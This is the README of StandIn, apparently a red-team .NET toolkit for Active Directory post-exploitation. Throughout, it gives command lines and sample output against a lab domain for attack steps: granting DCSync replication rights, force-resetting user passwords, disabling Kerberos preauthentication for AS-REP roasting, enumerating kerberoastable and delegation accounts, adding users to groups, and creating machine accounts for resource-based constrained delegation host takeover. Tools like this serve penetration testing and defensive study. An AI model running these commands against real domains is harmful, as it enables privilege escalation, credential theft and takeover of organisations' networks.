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StandIn - A Small .NET35/45 AD Post-Exploitation Toolkit


StandIn is a small AD post-compromise toolkit. StandIn came about because recently at xforcered we needed a .NET native solution to perform resource based constrained delegation. However, StandIn quickly ballooned to include a number of comfort features.

I want to continue developing StandIn to teach myself more about Directory Services programming and to hopefully expand a tool which fits in to the AD post-exploitation toolchain.



Roadmap

Contributing

Contributions are most welcome. Please ensure pull requests include the following items: description of the functionality, brief technical explanation and sample output.


ToDo's

The following items are currently on the radar for implementation in subsequent versions of StandIn.

  • Domain share enumeration. This can be split out into two parts, (1) finding and getting a unique list based on user home directories / script paths / profile paths and (2) querying fTDfs / msDFS-Linkv2 objects.
  • Finding and parsing GPO's to map users to host local groups.

Subject References

Index

Help
  __ ( _/_   _//   ~b33f__)/(//)(/(/)  v0.8 >--~~--> Args? <--~~--<--help        This help menu--object      LDAP filter, e.g. samaccountname=HWest--computer    Machine name, e.g. Celephais-01--group       Group name, e.g. "Necronomicon Admins"--ntaccount   User name, e.g. "REDHOOK\UPickman"--sid         String SID representing a target machine--grant       User name, e.g. "REDHOOK\KMason"--guid        Rights GUID to add to object, e.g. 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2--domain      Domain name, e.g. REDHOOK--user        User name--pass        Password--newpass     New password to set for object--type        Rights type: GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync--spn         Boolean, list kerberoastable accounts--delegation  Boolean, list accounts with unconstrained / constrained delegation--asrep       Boolean, list ASREP roastab   le accounts--dc          Boolean, list all domain controllers--remove      Boolean, remove msDS-AllowedToActOnBehalfOfOtherIdentity property from machine object--make        Boolean, make machine; ms-DS-MachineAccountQuota applies--disable     Boolean, disable machine; should be the same user that created the machine--access      Boolean, list access permissions for object--delete      Boolean, delete machine from AD; requires elevated AD access >--~~--> Usage? <--~~--<# Query object properties by LDAP filterStandIn.exe --object "(&(samAccountType=805306368)(servicePrincipalName=*vermismysteriis.redhook.local*))"StandIn.exe --object samaccountname=Celephais-01$ --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Query object access permissions, optionally filter by NTAccountStandIn.exe --object "distinguishedname=DC=redhook,DC=local" --accessStandIn.exe --object samaccountname=Rllyeh$    --access --ntaccount "REDHOOK\EDerby"StandIn.exe --object samaccountname=JCurwen --access --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Grant object access permissionsStandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --type DCSyncStandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2StandIn.exe --object samaccountname=SomeTarget001$ --grant "REDHOOK\MBWillett" --type GenericWrite --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Set object passwordStandIn.exe --object samaccountname=SomeTarget001$ --newpass "Arkh4mW1tch!"StandIn.exe --object samaccountname=BJenkin --newpass "Dr34m1nTh3H#u$e" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Add ASREP to userAccountControl flagsStandIn.exe --object samaccountname=HArmitage --asrepStandIn.exe --object samaccountname=FMorgan --asrep    --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Remove ASREP from userAccountControl flagsStandIn.exe --object samaccountname=TMalone --asrep --removeStandIn.exe --object samaccountname=RSuydam --asrep  --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Get a list of all ASREP roastable accountsStandIn.exe --asrepStandIn.exe --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Get a list of all kerberoastable accountsStandIn.exe --spnStandIn.exe --spn --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# List all accounts with unconstrained & constrained delegation privilegesStandIn.exe --delegationStandIn.exe --delegation --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Get a list of all domain controllersStandIn.exe --dc# List group membersStandIn.exe --group LiterarumStandIn.exe --group "Magna Ultima" --domain redhook --user R   Fludd --pass Cl4vi$Alchemi4e# Add user to groupStandIn.exe --group "Dunwich Council" --ntaccount "REDHOOK\WWhateley"StandIn.exe --group DAgon --ntaccount "REDHOOK\RCarter" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Create machine objectStandIn.exe --computer Innsmouth --makeStandIn.exe --computer Innsmouth --make --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Disable machine objectStandIn.exe --computer Arkham --disableStandIn.exe --computer Arkham --disable --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Delete machine objectStandIn.exe --computer Danvers --deleteStandIn.exe --computer Danvers --delete --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Add msDS-AllowedToActOnBehalfOfOtherIdentity to machine object propertiesStandIn.exe --computer Providence --sid S-1-5-21-1085031214-1563985344-725345543StandIn.exe --computer Providence --sid S-1-5-21-10   85031214-1563985344-725345543 --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Remove msDS-AllowedToActOnBehalfOfOtherIdentity from machine object propertiesStandIn.exe --computer Miskatonic --removeStandIn.exe --computer Miskatonic --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

LDAP Object Operations

All object operations expect that the LDAP filter returns a single object and will exit out if your query returns more. This is by design.


Get object

Use Case

Operationally, we may want to look at all of the properties of a specific object in AD. A common example would be to look at what groups a user account is member of or when a user account last authenticated to the domain.


Syntax

Get all properties of the resolved object. Queries can be simple matches for a single property or complex LDAP filters.

C:\> StandIn.exe --object samaccountname=m-10-1909-01$[?] Using DC : m-w16-dc01.main.redhook.local[?] Object   : CN=M-10-1909-01    Path     : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local[?] Iterating object properties[+] logoncount    |_ 360[+] codepage    |_ 0[+] objectcategory    |_ CN=Computer,CN=Schema,CN=Configuration,DC=main,DC=redhook,DC=local[+] iscriticalsystemobject    |_ False[+] operatingsystem    |_ Windows 10 Enterprise[+] usnchanged    |_ 195797[+] instancetype    |_ 4[+] name    |_ M-10-1909-01[+] badpasswordtime    |_ 0x0[+] pwdlastset    |_ 10/9/2020 4:42:02 PM UTC[+] serviceprincipalname    |_ TERMSRV/M-10-1909-01    |_ TERMSRV/m-10-1909-01.main.redhook.local    |_ WSMAN/m-10-1909-01    |_ WSMAN/m-10-1909-01.main.redhook.local    |_ RestrictedKrbHost/M-10-1   909-01    |_ HOST/M-10-1909-01    |_ RestrictedKrbHost/m-10-1909-01.main.redhook.local    |_ HOST/m-10-1909-01.main.redhook.local[+] objectclass    |_ top    |_ person    |_ organizationalPerson    |_ user    |_ computer[+] badpwdcount    |_ 0[+] samaccounttype    |_ SAM_MACHINE_ACCOUNT[+] lastlogontimestamp    |_ 11/1/2020 7:40:09 PM UTC[+] usncreated    |_ 31103[+] objectguid    |_ 17c80232-2ee6-47e1-9ab5-22c51c268cf0[+] localpolicyflags    |_ 0[+] whencreated    |_ 7/9/2020 4:59:55 PM[+] adspath    |_ LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local[+] useraccountcontrol    |_ WORKSTATION_TRUST_ACCOUNT[+] cn    |_ M-10-1909-01[+] countrycode    |_ 0[+] primarygroupid    |_ 515[+] whenchanged    |_ 11/2/2020 7:59:32 PM[+] operatingsystemversion    |_ 10.0 (18363)[+]    dnshostname    |_ m-10-1909-01.main.redhook.local[+] dscorepropagationdata    |_ 10/30/2020 6:56:30 PM    |_ 10/25/2020 1:28:32 AM    |_ 7/16/2020 2:15:26 PM    |_ 7/15/2020 8:54:17 PM    |_ 1/1/1601 12:04:17 AM[+] lastlogon    |_ 11/3/2020 10:21:11 AM UTC[+] distinguishedname    |_ CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local[+] msds-supportedencryptiontypes    |_ RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96[+] samaccountname    |_ M-10-1909-01$[+] objectsid    |_ S-1-5-21-1293271031-3053586410-2290657902-1126[+] lastlogoff    |_ 0[+] accountexpires    |_ 0x7FFFFFFFFFFFFFFF

Get object access permissions

Use Case

At certain stages of the engagement, the operator may want to resolve the access permissions for a specific object in AD. Many permissions can offer an operational avenue to expand access or achieve objectives. For instance, a WriteDacl permission on a group could allow the operator to grant him / her self permissions to add a new user to the group. Tools like SharpHound already, in many instances, reveal these Dacl weaknesses.


Syntax

Retrieve the active directory rules that apply to the resolved object and translate any schema / rights GUID's to their friendly name. Optionally filter the results by an NTAccount name.

C:\>StandIn.exe --object samaccountname=m-10-1909-01$ --access[?] Using DC : m-w19-dc01.main.redhook.local[?] Object   : CN=M-10-1909-01    Path     : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local[+] Object properties    |_ Owner : MAIN\domainjoiner    |_ Group : MAIN\Domain Join[+] Object access rules[+] Identity --> NT AUTHORITY\SELF    |_ Type       : Allow    |_ Permission : CreateChild, DeleteChild    |_ Object     : ANY[+] Identity --> NT AUTHORITY\Authenticated Users    |_ Type       : Allow    |_ Permission : GenericRead    |_ Object     : ANY        [... Snip ...]C:\> StandIn.exe --object samaccountname=m-10-1909-01$ --access --ntaccount "MAIN\domainjoiner"[?] Using DC : m-w19-dc01.main.redhook.local[?] Object   : CN=M-10-1909-01    Path     : LDAP://CN=M-10-1909-01,OU=Workstations,OU   =OCCULT,DC=main,DC=redhook,DC=local[+] Object properties    |_ Owner : MAIN\domainjoiner    |_ Group : MAIN\Domain Join[+] Object access rules[+] Identity --> MAIN\domainjoiner    |_ Type       : Allow    |_ Permission : DeleteTree, ExtendedRight, Delete, GenericRead    |_ Object     : ANY[+] Identity --> MAIN\domainjoiner    |_ Type       : Allow    |_ Permission : WriteProperty    |_ Object     : User-Account-Restrictions[+] Identity --> MAIN\domainjoiner    |_ Type       : Allow    |_ Permission : Self    |_ Object     : servicePrincipalName[+] Identity --> MAIN\domainjoiner    |_ Type       : Allow    |_ Permission : Self    |_ Object     : dNSHostName[+] Identity --> MAIN\domainjoiner    |_ Type       : Allow    |_ Permission : WriteProperty    |_ Object     : sAMAccountName[+] Identity --> MAIN\do   mainjoiner    |_ Type       : Allow    |_ Permission : WriteProperty    |_ Object     : displayName[+] Identity --> MAIN\domainjoiner    |_ Type       : Allow    |_ Permission : WriteProperty    |_ Object     : description[+] Identity --> MAIN\domainjoiner    |_ Type       : Allow    |_ Permission : WriteProperty    |_ Object     : User-Logon[+] Identity --> MAIN\domainjoiner    |_ Type       : Allow    |_ Permission : Self    |_ Object     : DS-Validated-Write-Computer

Grant object access permission

Use Case

With the appropriate rights, the operator can grant an NTAccount special permissions over a specific object in AD. For instance, if an operator has GenericAll privileges over a user account they can grant themselves or a 3rd party NTAccount permission to change the user’s password without knowing the current password.


Syntax

Add permission to the resolved object for a specified NTAccount. StandIn supports a small set of pre-defined privileges (GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync) but it also allows operators to specify a custom rights guid using the --guid flag.

C:\> whoamimain\s4uuserC:\> StandIn.exe --group lowPrivButMachineAccess[?] Using DC : m-w19-dc01.main.redhook.local[?] Group    : lowPrivButMachineAccess    GUID     : 37e3d957-af52-4cc6-8808-56330f8ec882[+] Members[?] Path           : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local    samAccountName : s4uUser    Type           : User    SID            : S-1-5-21-1293271031-3053586410-2290657902-1197    C:\> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --access --ntaccount "MAIN\lowPrivButMachineAccess"[?] Using DC : m-w19-dc01.main.redhook.local[?] Object   : DC=main    Path     : LDAP://DC=main,DC=redhook,DC=local[+] Object properties    |_ Owner : BUILTIN\Administrators    |_ Group : BUILTIN\Administrators[+] Object access rules[+] Identity --> MAIN\lowPrivButMachineAccess       |_ Type       : Allow    |_ Permission : WriteDacl    |_ Object     : ANYC:\> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --grant "MAIN\s4uuser" --type DCSync[?] Using DC : m-w19-dc01.main.redhook.local[?] Object   : DC=main    Path     : LDAP://DC=main,DC=redhook,DC=local[+] Object properties    |_ Owner : BUILTIN\Administrators    |_ Group : BUILTIN\Administrators[+] Set object access rules    |_ Success, added dcsync privileges to object for MAIN\s4uuserC:\> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --access --ntaccount "MAIN\s4uUser"[?] Using DC : m-w19-dc01.main.redhook.local[?] Object   : DC=main    Path     : LDAP://DC=main,DC=redhook,DC=local[+] Object properties    |_ Owner : BUILTIN\Administrators    |_ Group : BUILTIN\Administrators[+] Object access rules[+] Identity --&g   t; MAIN\s4uUser    |_ Type       : Allow    |_ Permission : ExtendedRight    |_ Object     : DS-Replication-Get-Changes-All[+] Identity --> MAIN\s4uUser    |_ Type       : Allow    |_ Permission : ExtendedRight    |_ Object     : DS-Replication-Get-Changes[+] Identity --> MAIN\s4uUser    |_ Type       : Allow    |_ Permission : ExtendedRight    |_ Object     : DS-Replication-Get-Changes-In-Filtered-Set

Set object password

Use Case

If the operator has User-Force-Change-Password permissions over a user object they can change the password for that user account without knowing the current password. This action is destructive as the user will no longer be able to authenticate which may raise alarm bells.


Syntax

Set the resolved object's password without knowing the current password.

C:\> whoamimain\s4uuserC:\> StandIn.exe --object "samaccountname=user005" --access --ntaccount "MAIN\lowPrivButMachineAccess"[?] Using DC : m-w16-dc01.main.redhook.local[?] Object   : CN=User 005    Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local[+] Object properties    |_ Owner : MAIN\Domain Admins    |_ Group : MAIN\Domain Admins[+] Object access rules[+] Identity --> MAIN\lowPrivButMachineAccess    |_ Type       : Allow    |_ Permission : WriteDacl    |_ Object     : ANYC:\> StandIn.exe --object "samaccountname=user005" --grant "MAIN\s4uuser" --type resetpassword[?] Using DC : m-w16-dc01.main.redhook.local[?] Object   : CN=User 005    Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local[+] Object properties    |_ Owner : MAIN\Domain Admins    |_ Group : MAIN\Domain Adm   ins[+] Set object access rules    |_ Success, added resetpassword privileges to object for MAIN\s4uuserC:\> StandIn.exe --object "samaccountname=user005" --access --ntaccount "MAIN\s4uUser"[?] Using DC : m-w16-dc01.main.redhook.local[?] Object   : CN=User 005    Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local[+] Object properties    |_ Owner : MAIN\Domain Admins    |_ Group : MAIN\Domain Admins[+] Object access rules[+] Identity --> MAIN\s4uUser    |_ Type       : Allow    |_ Permission : ExtendedRight    |_ Object     : User-Force-Change-PasswordC:\> StandIn.exe --object "samaccountname=user005" --newpass "Arkh4mW1tch!"[?] Using DC : m-w16-dc01.main.redhook.local[?] Object   : CN=User 005    Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local[+] Object properties    |_ Owner :    MAIN\Domain Admins    |_ Group : MAIN\Domain Admins[+] Setting account password    |_ Success, password set for object

Add/Remove ASREP from object flags

Use Case

If the operator has write access to a user account, they can modify the user’s userAccountControl flags to include DONT_REQUIRE_PREAUTH. Doing so allows the operator to request an AS-REP hash for the user which can be cracked offline. This process is very similar to kerberoasting. This action is not destructive, but it relies on the fact that the user has a password which can be cracked in a reasonable timeframe.


Syntax

Add and remove DONT_REQUIRE_PREAUTH from the resolved object's userAccountControl flags.

C:\> StandIn.exe --object "samaccountname=user005" --asrep[?] Using DC : m-w16-dc01.main.redhook.local[?] Object   : CN=User 005    Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local[*] SamAccountName           : user005    DistinguishedName        : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local    userAccountControl       : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD[+] Updating userAccountControl..    |_ SuccessC:\> StandIn.exe --asrep[?] Using DC : m-w16-dc01.main.redhook.local[?] Found 1 object(s) that do not require Kerberos preauthentication..[*] SamAccountName           : user005    DistinguishedName        : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local    userAccountControl       : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTHC:\> StandIn.exe --object "samaccountname=user005" --asrep --rem   ove[?] Using DC : m-w16-dc01.main.redhook.local[?] Object   : CN=User 005    Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local[*] SamAccountName           : user005    DistinguishedName        : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local    userAccountControl       : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH[+] Updating userAccountControl..    |_ SuccessC:\> StandIn.exe --asrep[?] Using DC : m-w16-dc01.main.redhook.local[?] Found 0 object(s) that do not require Kerberos preauthentication..

ASREP

Use Case

This function enumerates all accounts in AD which are currently enabled and have DONT_REQUIRE_PREAUTH as part of their userAccountControl flags. These accounts can be AS-REP roasted, this process is very similar to kerberoasting.


Syntax

Return all accounts that are ASREP roastable.

C:\> StandIn.exe --asrep[?] Using DC : m-w16-dc01.main.redhook.local[?] Found 1 object(s) that do not require Kerberos preauthentication..[*] SamAccountName           : user005    DistinguishedName        : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local    userAccountControl       : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH

SPN

Use Case

This function enumerates all accounts in AD which are currently enabled and can be kerberoasted. Some basic account information is added for context: when was the password last set, when was the account last used and what encryption types are supported.


Syntax

Return all accounts that are kerberoastable.

C:\> StandIn.exe --spn[?] Using DC : m-w16-dc01.main.redhook.local[?] Found 1 kerberostable users..[*] SamAccountName         : SimCritical    DistinguishedName      : CN=SimCritical,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local    ServicePrincipalName   : ldap/M-2012R2-03.main.redhook.local    PwdLastSet             : 11/2/2020 7:06:17 PM UTC    lastlogon              : 0x0    Supported ETypes       : RC4_HMAC_DEFAULT

Unconstrained / constrained / resource-based constrained delegation

Use Case

This function enumerates all accounts that are permitted to perform unconstrained, constrained, or resource-based constrained delegation. These assets can be used to expand access or achieve objectives.


Syntax

Return all accounts that have either unconstrained or constrained delegation permissions, or have inbound resource-based constrained delegation privileges.

C:\> StandIn.exe --delegation[?] Using DC : m-w16-dc01.main.redhook.local[?] Found 3 object(s) with unconstrained delegation..[*] SamAccountName           : M-2019-03$    DistinguishedName        : CN=M-2019-03,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local    userAccountControl       : WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION[*] SamAccountName           : M-W16-DC01$    DistinguishedName        : CN=M-W16-DC01,OU=Domain Controllers,DC=main,DC=redhook,DC=local    userAccountControl       : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION[*] SamAccountName           : M-W19-DC01$    DistinguishedName        : CN=M-W19-DC01,OU=Domain Controllers,DC=main,DC=redhook,DC=local    userAccountControl       : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION[?] Found 2 object(s) with constrained delegation..[*] SamAccountName           : M-2019-04$    DistinguishedName           : CN=M-2019-04,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local    msDS-AllowedToDelegateTo : HOST/m-w16-dc01.main.redhook.local/main.redhook.local                               HOST/m-w16-dc01.main.redhook.local                               HOST/M-W16-DC01                               HOST/m-w16-dc01.main.redhook.local/MAIN                               HOST/M-W16-DC01/MAIN    Protocol Transition      : False    userAccountControl       : WORKSTATION_TRUST_ACCOUNT[*] SamAccountName           : M-2019-05$    DistinguishedName        : CN=M-2019-05,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local    msDS-AllowedToDelegateTo : cifs/m-2012r2-03.main.redhook.local                               cifs/M-2012R2-03    Protocol Transition      : True    userAccountControl       : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION[?] Found 1 object(s) with resource-based constrained delegation..   [*] SamAccountName           : M-10-1909-01$    DistinguishedName        : CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local    Inbound Delegation       : Server Admins [GROUP]    userAccountControl       : WORKSTATION_TRUST_ACCOUNT

DC's

Use Case

This function provides situational awareness by finding all domain controllers and listing some of their properties including their role assignments.


Syntax

Get all domain controllers.

C:\> StandIn.exe --dc[?] Using DC    : m-w16-dc01.main.redhook.local    |_ Domain   : main.redhook.local[*] Host                  : m-w16-dc01.main.redhook.local    Domain                : main.redhook.local    Forest                : main.redhook.local    SiteName              : Default-First-Site-Name    IP                    : 10.42.54.5    OSVersion             : Windows Server 2016 Datacenter    Local System Time UTC : Tuesday, 03 November 2020 03:29:17    Role                  : SchemaRole                            NamingRole                            PdcRole                            RidRole                            InfrastructureRole[*] Host                  : m-w19-dc01.main.redhook.local    Domain                : main.redhook.local    Forest                : main.redhook.local    SiteName              : Default-First-Site-Name    IP                       : 10.42.54.13    OSVersion             : Windows Server 2019 Datacenter    Local System Time UTC : Tuesday, 03 November 2020 03:29:17

Groups Operations

These functions deal specificaly with domain groups.


List group membership

Use Case

This function provides situational awareness, listing all members of a domain group including their type (user or nested group).


Syntax

Enumerate group membership and provide rudementary details for the member objects.

C:\> StandIn.exe --group "Server Admins"[?] Using DC : m-w16-dc01.main.redhook.local[?] Group    : Server Admins    GUID     : 92af8954-58cc-4fa4-a9ba-69bfa5524b5c[+] Members[?] Path           : LDAP://CN=Workstation Admins,OU=Groups,OU=OCCULT,DC=main,DC=redhook,DC=local    samAccountName : Workstation Admins    Type           : Group    SID            : S-1-5-21-1293271031-3053586410-2290657902-1108[?] Path           : LDAP://CN=Server Admin 001,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local    samAccountName : srvadmin001    Type           : User    SID            : S-1-5-21-1293271031-3053586410-2290657902-1111[?] Path           : LDAP://CN=Server Admin 002,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local    samAccountName : srvadmin002    Type           : User    SID            : S-1-5-21-1293271031-3053586410-2290657902-1184[?] Path           : LDAP://CN   =Server Admin 003,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local    samAccountName : srvadmin003    Type           : User    SID            : S-1-5-21-1293271031-3053586410-2290657902-1185[?] Path           : LDAP://CN=Server Admin 004,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local    samAccountName : srvadmin004    Type           : User    SID            : S-1-5-21-1293271031-3053586410-2290657902-1186[?] Path           : LDAP://CN=Server Admin 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local    samAccountName : srvadmin005    Type           : User    SID            : S-1-5-21-1293271031-3053586410-2290657902-1187[?] Path           : LDAP://CN=SimCritical,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local    samAccountName : SimCritical    Type           : User    SID            : S-1-5-21-1293271031-3053586410-2290657902-1204

Add user to group

Use Case

With appropriate access the operator can add an NTAccount to a domain group.


Syntax

Add an NTAccount identifier to a domain group. Normally this would be a user but it could also be a group.

C:\> StandIn.exe --group lowprivbutmachineaccess[?] Using DC : m-w16-dc01.main.redhook.local[?] Group    : lowPrivButMachineAccess    GUID     : 37e3d957-af52-4cc6-8808-56330f8ec882[+] Members[?] Path           : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local    samAccountName : s4uUser    Type           : User    SID            : S-1-5-21-1293271031-3053586410-2290657902-1197C:\> StandIn.exe --group lowprivbutmachineaccess --ntaccount "MAIN\user001"[?] Using DC : m-w16-dc01.main.redhook.local[?] Group    : lowPrivButMachineAccess    GUID     : 37e3d957-af52-4cc6-8808-56330f8ec882[+] Adding user to group    |_ SuccessC:\> StandIn.exe --group lowprivbutmachineaccess[?] Using DC : m-w16-dc01.main.redhook.local[?] Group    : lowPrivButMachineAccess    GUID     : 37e3d957-af52-4cc6-8808-56330f8ec882[+] Members[?] Path           : LDAP://CN=User 001,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local    samAccountName : user001    Type           : User    SID            : S-1-5-21-1293271031-3053586410-2290657902-1106[?] Path           : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local    samAccountName : s4uUser    Type           : User    SID            : S-1-5-21-1293271031-3053586410-2290657902-1197

Machine Object Operations

These functions specifically are for machine operations and expect the machine name as an input.


Create machine object

Use Case

The operator may wish to create a machine object in order to perform a resource based constrained delegation attack. By default any domain user has the ability to create up to 10 machines on the local domain.


Syntax

Create a new machine object with a random password, user ms-DS-MachineAccountQuota applies to this operation.

C:\> StandIn.exe --computer M-1337-b33f --make[?] Using DC    : m-w16-dc01.main.redhook.local    |_ Domain   : main.redhook.local    |_ DN       : CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local    |_ Password : MlCGkaacS5SRUOt[+] Machine account added to AD..

The ms-DS-MachineAccountQuota property exists in the domain root object. If you need to verify the quota you can perform an object search as shown below.

C:\> StandIn.exe --object ms-DS-MachineAccountQuota=*

Disable machine object

Use Case

Standard users do not have the ability to delete a machine object, however a user that create a machine can thereafter disable the machine object.


Syntax

Disable a machine that was previously created. This action should be performed in the context of the same user that created the machine. Note that non-elevated users can't delete machine objects only disable them.

C:\> StandIn.exe --computer M-1337-b33f --disable[?] Using DC : m-w16-dc01.main.redhook.local[?] Object   : CN=M-1337-b33f    Path     : LDAP://CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local[+] Machine account currently enabled    |_ Account disabled..

Delete machine object

Use Case

With elevated AD privileges the operator can delete a machine object, such as once create earlier in the attack chain.


Syntax

Use an elevated context to delete a machine object.

C:\> StandIn.exe --computer M-1337-b33f --delete[?] Using DC : m-w16-dc01.main.redhook.local[?] Object   : CN=M-1337-b33f    Path     : LDAP://CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local[+] Machine account deleted from AD

Add msDS-AllowedToActOnBehalfOfOtherIdentity

Use Case

With write access to a machine object this function allows the operator to add an msDS-AllowedToActOnBehalfOfOtherIdentity property to the machine which is required to perform a resource based constrained delegation attack.


Syntax

Add an msDS-AllowedToActOnBehalfOfOtherIdentity propert to the machine along with a SID to facilitate host takeover using resource based constrained delegation.

C:\> StandIn.exe --computer m-10-1909-03 --sid S-1-5-21-1293271031-3053586410-2290657902-1205[?] Using DC : m-w16-dc01.main.redhook.local[?] Object   : CN=M-10-1909-03    Path     : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local[+] SID added to msDS-AllowedToActOnBehalfOfOtherIdentityC:\> StandIn.exe --object samaccountname=m-10-1909-03$[?] Using DC : m-w16-dc01.main.redhook.local[?] Object   : CN=M-10-1909-03    Path     : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local[?] Iterating object properties[+] logoncount    |_ 107[+] codepage    |_ 0[+] objectcategory    |_ CN=Computer,CN=Schema,CN=Configuration,DC=main,DC=redhook,DC=local[+] iscriticalsystemobject    |_ False[+] operatingsystem    |_ Windows 10 Enterprise[+] usnchanged    |_ 195771[+] instancetype    |_ 4   [+] name    |_ M-10-1909-03[+] badpasswordtime    |_ 7/9/2020 5:07:11 PM UTC[+] pwdlastset    |_ 10/29/2020 6:44:08 PM UTC[+] serviceprincipalname    |_ TERMSRV/M-10-1909-03    |_ TERMSRV/m-10-1909-03.main.redhook.local    |_ WSMAN/m-10-1909-03    |_ WSMAN/m-10-1909-03.main.redhook.local    |_ RestrictedKrbHost/M-10-1909-03    |_ HOST/M-10-1909-03    |_ RestrictedKrbHost/m-10-1909-03.main.redhook.local    |_ HOST/m-10-1909-03.main.redhook.local[+] objectclass    |_ top    |_ person    |_ organizationalPerson    |_ user    |_ computer[+] badpwdcount    |_ 0[+] samaccounttype    |_ SAM_MACHINE_ACCOUNT[+] lastlogontimestamp    |_ 10/29/2020 12:29:26 PM UTC[+] usncreated    |_ 31127[+] objectguid    |_ c02cff97-4bfd-457c-a568-a748b0725c2f[+] localpolicyflags    |_ 0[+] whencreated    |_ 7/9/2020 5:05:08 PM[+] adspa   th    |_ LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local[+] useraccountcontrol    |_ WORKSTATION_TRUST_ACCOUNT[+] cn    |_ M-10-1909-03[+] countrycode    |_ 0[+] primarygroupid    |_ 515[+] whenchanged    |_ 11/2/2020 7:55:14 PM[+] operatingsystemversion    |_ 10.0 (18363)[+] dnshostname    |_ m-10-1909-03.main.redhook.local[+] dscorepropagationdata    |_ 10/30/2020 6:56:30 PM    |_ 10/30/2020 10:55:22 AM    |_ 10/29/2020 4:58:51 PM    |_ 10/29/2020 4:58:29 PM    |_ 1/1/1601 12:00:01 AM[+] lastlogon    |_ 11/2/2020 9:07:20 AM UTC[+] distinguishedname    |_ CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local[+] msds-supportedencryptiontypes    |_ RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96[+] samaccountname    |_ M-10-1909-03$[+] objectsid    |_ S-1-5-21-1293271031-30535   86410-2290657902-1127[+] lastlogoff    |_ 0[+] msds-allowedtoactonbehalfofotheridentity    |_ BinLen           : 36    |_ AceQualifier     : AccessAllowed    |_ IsCallback       : False    |_ OpaqueLength     : 0    |_ AccessMask       : 983551    |_ SID              : S-1-5-21-1293271031-3053586410-2290657902-1205    |_ AceType          : AccessAllowed    |_ AceFlags         : None    |_ IsInherited      : False    |_ InheritanceFlags : None    |_ PropagationFlags 